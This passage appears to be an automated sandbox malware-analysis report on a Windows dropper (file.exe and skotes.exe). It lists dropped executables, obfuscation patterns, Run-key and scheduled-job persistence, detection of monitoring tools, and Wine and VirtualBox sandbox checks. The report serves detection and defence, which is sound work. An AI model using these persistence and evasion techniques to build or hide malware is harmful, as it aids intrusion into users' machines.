Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Unpacked PE file: 9.2.e051bdf457.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Unpacked PE file: 10.2.79ddad050f.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Unpacked PE file: 29.2.e051bdf457.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Unpacked PE file: 30.2.734386a52c.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W;pzmyaaxr:EW;wkcwmztw:EW;.taggant:EW; vs :ER;.rsrc:W;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1f17a6 should be: 0x1ed21e
Source: 4611cc433b.exe.6.dr Static PE information: real checksum: 0x1f17a6 should be: 0x1ed21e
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1c274a should be: 0x1b8d69
Source: 79ddad050f.exe.6.dr Static PE information: real checksum: 0x1c06e1 should be: 0x1c72fd
Source: e051bdf457.exe.6.dr Static PE information: real checksum: 0x1c274a should be: 0x1b8d69
Source: file.exe Static PE information: real checksum: 0x32fb32 should be: 0x3328f6
Source: 734386a52c.exe.6.dr Static PE information: real checksum: 0x2b049b should be: 0x2afad6
Source: skotes.exe.0.dr Static PE information: real checksum: 0x32fb32 should be: 0x3328f6
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1c06e1 should be: 0x1c72fd
Source: random[2].exe.6.dr Static PE information: real checksum: 0x2b049b should be: 0x2afad6
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: frfapimt
Source: file.exe Static PE information: section name: qtisgtef
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: frfapimt
Source: skotes.exe.0.dr Static PE information: section name: qtisgtef
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: whvqijov
Source: random[1].exe.6.dr Static PE information: section name: ikwniflt
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name: .idata
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name: whvqijov
Source: 4611cc433b.exe.6.dr Static PE information: section name: ikwniflt
Source: 4611cc433b.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: sbjgrbkb
Source: random[1].exe0.6.dr Static PE information: section name: biqspjfj
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name: .idata
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name: sbjgrbkb
Source: 79ddad050f.exe.6.dr Static PE information: section name: biqspjfj
Source: 79ddad050f.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: dnuvwdxn
Source: random[1].exe1.6.dr Static PE information: section name: nviifddd
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name: .idata
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name: dnuvwdxn
Source: e051bdf457.exe.6.dr Static PE information: section name: nviifddd
Source: e051bdf457.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name: pzmyaaxr
Source: random[2].exe.6.dr Static PE information: section name: wkcwmztw
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 734386a52c.exe.6.dr Static PE information: section name:
Source: 734386a52c.exe.6.dr Static PE information: section name: .idata
Source: 734386a52c.exe.6.dr Static PE information: section name: pzmyaaxr
Source: 734386a52c.exe.6.dr Static PE information: section name: wkcwmztw
Source: 734386a52c.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAD91C push ecx; ret 0_2_00AAD92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA1359 push es; ret 0_2_00AA135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0020D91C push ecx; ret 2_2_0020D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0020D91C push ecx; ret 3_2_0020D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020D91C push ecx; ret 6_2_0020D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020DFC6 push ecx; ret 6_2_0020DFD9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D195F7 push ecx; ret 7_3_04D1960A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D3037D push esi; ret 7_3_04D30386
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A1F7 push ecx; ret 7_2_0040A20A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00421B7D push esi; ret 7_2_00421B86
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_1000E891 push ecx; ret 7_2_1000E8A4
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], esi 7_2_0099A52B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], edx 7_2_0099A54A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 2880708Ch; mov dword ptr [esp], edx 7_2_0099A601
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edi; mov dword ptr [esp], ebx 7_2_0099A623
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], ebx 7_2_0099A67C
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edx; mov dword ptr [esp], esi 7_2_0099A692
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ecx; mov dword ptr [esp], 7BE5345Bh 7_2_0099A706
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ebp; mov dword ptr [esp], ebx 7_2_0099A73B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 2AD25EA1h; mov dword ptr [esp], esi 7_2_0099A7EC
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edi; mov dword ptr [esp], 7FFF4CD9h 7_2_0099A896
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 31F95A20h; mov dword ptr [esp], eax 7_2_0099A91F
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], 4A49C712h 7_2_0099A94D
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edx; mov dword ptr [esp], 0FFE31AAh 7_2_0099AA7B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ecx; mov dword ptr [esp], 4F8C644Ah 7_2_0099AADC
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 2418A2A2h; mov dword ptr [esp], edx 7_2_0099AB22
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 7DD601E9h; mov dword ptr [esp], esi 7_2_0099ABBB
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ecx; mov dword ptr [esp], ebx 7_2_0099ABE9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push esi; mov dword ptr [esp], ebp 7_2_0099AC20
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ebx; mov dword ptr [esp], edi 7_2_0099AC7D
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 0F59DBE4h; mov dword ptr [esp], ecx 7_2_0099ACA0
Source: file.exe Static PE information: section name: entropy: 7.092808136704337
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.092808136704337
Source: random[1].exe.6.dr Static PE information: section name: whvqijov entropy: 7.941395599436267
Source: 4611cc433b.exe.6.dr Static PE information: section name: whvqijov entropy: 7.941395599436267
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.983244716136416
Source: random[1].exe0.6.dr Static PE information: section name: sbjgrbkb entropy: 7.954135504267137
Source: 79ddad050f.exe.6.dr Static PE information: section name: entropy: 7.983244716136416
Source: 79ddad050f.exe.6.dr Static PE information: section name: sbjgrbkb entropy: 7.954135504267137
Source: random[1].exe1.6.dr Static PE information: section name: dnuvwdxn entropy: 7.953787328423517
Source: e051bdf457.exe.6.dr Static PE information: section name: dnuvwdxn entropy: 7.953787328423517
Source: random[2].exe.6.dr Static PE information: section name: entropy: 7.7986677866136604
Source: 734386a52c.exe.6.dr Static PE information: section name: entropy: 7.7986677866136604
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba17bbfb21.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 734386a52c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 79ddad050f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e051bdf457.exe Jump to behavior
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 79ddad050f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 79ddad050f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e051bdf457.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e051bdf457.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba17bbfb21.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba17bbfb21.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 734386a52c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 734386a52c.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
